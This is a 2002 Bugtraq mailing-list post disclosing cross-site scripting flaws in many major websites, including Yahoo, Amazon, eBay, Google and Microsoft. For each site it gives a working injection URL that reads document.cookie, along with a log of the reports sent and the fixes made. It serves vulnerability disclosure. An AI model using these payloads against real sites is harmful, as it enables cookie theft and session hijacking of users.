[25195] in bugtraq
Cross site scripting in almost every mayor website
daemon@ATHENA.MIT.EDU (Berend-Jan Wever)
Sat Apr 20 16:20:57 2002
Date: 19 Apr 2002 17:28:06 -0000
Message-ID: <20020419172806.9886.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Berend-Jan Wever <skylined@edup.tudelft.nl>
To: bugtraq@securityfocus.com
On april 26 I posted a message about Cross-Site
scripting (see bottom) I mentioned that I had
found Cross-site scripting flaws in many major
websites but I did not publish the exact details of
these flaws. After notifying the owners of these
sites and giving them time to respond and fix the
problem, I now feel I have to post the details to
bugtraq. This information and more on cross-site
scripting can also be found on my website
http://spoor12.edup.tudelft.nl/skylined which is
updated almost daily.
Kind regards,
Berend-Jan Wever.
Cross-site scripting archive: Here are all the sites
that I know to have at least one cross-site
scripting flaw. I have logged all the
communication I have had with them. (Last
update April 19, 2002)
www.search.com http://www.search.com/search?
q='><SCRIPT>alert(document.cookie)
</SCRIPT>'
- 23 mar 2002 Reported
@ "http://www.cnet.com/cnetsupport/contact/1,10
161,0-3945,00.html"
- 28 mar 2002 Reported
@ "http://www.search.com/feedback/"
------------------------------------------------------------------
--------------
www.altavista.com
http://www.altavista.com/sites/search/web?
q=*&kl="><SCRIPT>alert(document.cookie)
</SCRIPT>
- 23 mar 2002 Reported
@ "http://help.altavista.com/contact/search"
- 25 mar 2002 Reply by email: "We have
forwarded your email to our engineering team for
further investigation"
------------------------------------------------------------------
--------------
edit.yahoo.com
http://edit.yahoo.com/config?.done="%
20style="width:expression(document.write
(document.cookie));
- 27 mar 2002 Reported to "arturo@yahoo-
inc.com", "mfk@yahoo-inc.com"
------------------------------------------------------------------
--------------
search.netscape.com
addressbook.netscape.com
http://search.netscape.com/search.psp?
search="><SCRIPT>alert(document.cookie)
</SCRIPT>
http://addressbook.netscape.com/search.adp?
SearchStr="><SCRIPT>alert(document.cookie)
</SCRIPT>
(Addressbook.netscape.com requires you to be
logged in)
- 23 mar 2002 Reported
@ "http://help.netscape.com/website/feedback.ht
ml"
------------------------------------------------------------------
--------------
cq-search.ebay.com http://cq-
search.ebay.com/search/search.dll?
MfcISAPICommand=GetResult&ht="><SCRIPT>a
lert(document.cookie)</SCRIPT>&query=a
- 26 mar 2002 Reported to "clalonde@ebay.com"
- 27 mar 2002 Reply by email: "Reviewing the
issue", "Do you have any suggestions?"
- 27 mar 2002 Gave some hints and told them
about my CSS howto.
------------------------------------------------------------------
--------------
www.amazon.com
http://www.amazon.com/exec/obidos/ASIN/B0000
5T68P/ref%3D%20style%3Dwidth%
3Aexpression%28document.write%
28document.cookie%29%29%20/
- 23 mar 2002 Reported
@ "http://www.amazon.com/exec/obidos/handle-
generic-form/102-3185800-6674542?action=next-
page&target=stores/help/self-service-email-form-
dispatch.html&display=basic&browse=560710&m
ethod=GET&cgi-post-result=1/102-3185800-
6674542."
- 26 mar 2002 "Cyrus@amazon.com" responded
to my bugtraq post
- 26 mar 2002 Reported to "Cyrus@amazon.com"
- 26 mar 2002 Told them about my CSS howto.
------------------------------------------------------------------
--------------
www.looksmart.com cnn.looksmart.com
http://www.looksmart.com/r_search?
look=&key=><SCRIPT>alert(document.cookie)
</SCRIPT>
http://cnn.looksmart.com/r_search?
look=&key=><SCRIPT>alert(document.cookie)
</SCRIPT>
- 23 mar 2002 Reported
to "feedback@looksmart.net"
------------------------------------------------------------------
--------------
www.time.com
http://www.time.com/time/searchresults?
query=a&summaries="%
20style="width:expression(document.write
(document.cookie))"
- 23 mar 2002 Reported to "daily@timeinc.net"
- 26 mar 2002 Reported
to "Renee_Guttmann@timeinc.com"
------------------------------------------------------------------
--------------
www.infospace.com
http://www.infospace.com/info.xcite/dog/newsresul
ts.htm?&qkw="><SCRIPT>alert(document.cookie)
</SCRIPT>&qcat=news&fs=nws
- 23 mar 2002 Reported
@ "http://www.infospace.com/info/redirs_all.htm?
pgtarg=abtct&"
------------------------------------------------------------------
--------------
www.lasseters.com.au
http://www.lasseters.com.au/default3.asp?
Network="%20onload="alert(document.cookie);"%
20z="
- 28 mar 2002 Reported
@ "http://www.lasseters.com.au/help/onetoone.ht
ml" to Karl F (chatid 114640)
- 28 mar 2002 Reported
to "support@lasseters.com.au"
- 28 mar 2002 (Automated) reply by email: "our
priority is to respond to your query as soon as
possible", tracking number T20020328004M
- 28 mar 2002 Reply by email: "We are
investigating this issue very seriously", "I have
passed this information onto the relevant
department"
------------------------------------------------------------------
--------------
my.abcnews.go.com
http://my.abcnews.go.com/localpageMainHandler
?input=<SCRIPT>alert(document.cookie)
</SCRIPT>
- 28 mar 2002 Reported
@ "http://abcnews.go.com/service/Help/abccontac
tform.html"
Fixed cross-site scripting flaws archive
Here are all the cross-site scripting flaws I
uncovered which have been fixed now. This is
just to show how it was done and who have been
found wanting.
www.redhat.com
http://www.redhat.com/apps/search/results.html?
ie="><SCRIPT>alert(document.cookie)
</SCRIPT>
- 26 mar 2002 "mjc@redhat.com" responded to
my bugtraq post.
- 26 mar 2002 Reported to "mjc@redhat.com"
- 26 mar 2002 Reply
from "tlancast@redhat.com": "Fixed now"
------------------------------------------------------------------
--------------
www.hotmail.com See my MSN Hotmail Cross-
site scripting page for more information
- 19 mar 2002 Reported @ "Report a bug on the
Hotmail website" (url contained sensitive
information ;)~
- 22 mar 2002 Reported
to "support@hotmail.com" - bounced
- 23 mar 2002 Reply
from "abuse@css.one.microsoft.com": "Look at
the help if you have any problems using hotmail"
- 27 mar 2002 Explained it was a serious issue
to "abuse@css.one.microsoft.com"
- 27 mar 2002 Reply
from "abuse@css.one.microsoft.com": "Your e-
mail has been forwarded to the appropriate team"
- 28 mar 2002 Reply
from "support_x@css.one.microsoft.com": "We
have tried to reproduce the error, but have been
unable to do so"
- 29 mar 2002 Send a working example
to "cs_serv@hotmail.com"
- 30 mar 2002 Reply
from "cs_serv@hotmail.com": "We have
confirmed the issue that you describe and are
currently working on a fix"
- 30 mar 2002 Reply
from "cs_serv@hotmail.com": "we have isolated
the bug and expect to have a fix for it out by
Wednesday." (3 apr 2002)
The fix: as far as I could find out they now replace
the properties 'dataFld', 'dataFormatAs'
and 'dataSrc' of any HTML tag
with 'xdataFld', 'xdataFormatAs' and 'xdataSrc' to
prevent XML generation of HTML alltogether.
MSN Hotmail has been very polite to thank me for
bringing this to their attention multiple times.
------------------------------------------------------------------
--------------
search.microsoft.com
http://search.microsoft.com/default.asp?qu=";%
0D%0Aalert(document.cookie);%0D%
0Aa="&boolean=ALL
This one was fixed within hours after discovery
and without me notifying microsoft, now that's
service!
------------------------------------------------------------------
--------------
www.google.com http://www.google.nl/search?
as_q=a&ie="><SCRIPT>alert(document.cookie)
</SCRIPT>
- 23 mar 2002 Reported
to "webmaster@google.com"
- 23 mar 2002 (Automated) reply by email: "you'll
hear from us soon"
The fix: all '<' and '>' characters are replaced
with '_'.
I have not received a word from Google except
for the automated responds. (Guess whether I'm
gonna report the next CSS to them...)
------------------------------------------------------------------
--------------
www.nic.cc http://www.nic.cc/cgi-bin/cart?
domain=<SCRIPT>alert(document.cookie)
</SCRIPT>
- 23 mar 2002 Reported to "clientcare@enic.cc"
The fix: filter out '<' and '>'.
I have not received a word from Nic.cc. (Guess
whether I'm gonna report the next CSS to them...)
------------------------------------------------------------------
--------------
support.microsoft.com
http://support.microsoft.com/default.aspx?scid=');}
alert(document.cookie);{//
- 28 mar 2002 Reported
to "support@microsoft.com"
- 28 mar 2002 (Automated) reply by email: "Your
e-mail <snip> will be handled personally by one
of our Customer Service Representatives within
24 hours"
The fix: The ' in the expoit url used to end a string
but this string is now enclosed by " instead of ',
the " character is filtered out.
I have not received a word from microsoft support
except for the automated responds. (Guess
whether I'm gonna report the next CSS to them...)
------------------------------------------------------------------
--------------
download.cnet.com
http://download.cnet.com/downloads/1,10150,0-
10001-103-0-1-7,00.html?qt=<SCRIPT>alert
(document.cookie)</SCRIPT>
- 28 mar 2002 Reported
@ "http://download.cnet.com/downloads/0-10000-
7-1532857.html?tag=subnav"
The fix: The characters <, > and " are replaced
with <, > and ".
------------------------------------------------------------------
--------------
www.nu http://www.nu/tour/tour_images.cfm?
ID=EN&site=<SCRIPT>alert(document.cookie)
</SCRIPT>
(The error report would suggest a SQL-injection
vulnerability but I have not done further testing.)
- 23 mar 2002 Reported both CSS & SQL-
injection to "dwd@mail.nic.nu"
- 19 apr 2002 The bug seems to have been fixed.
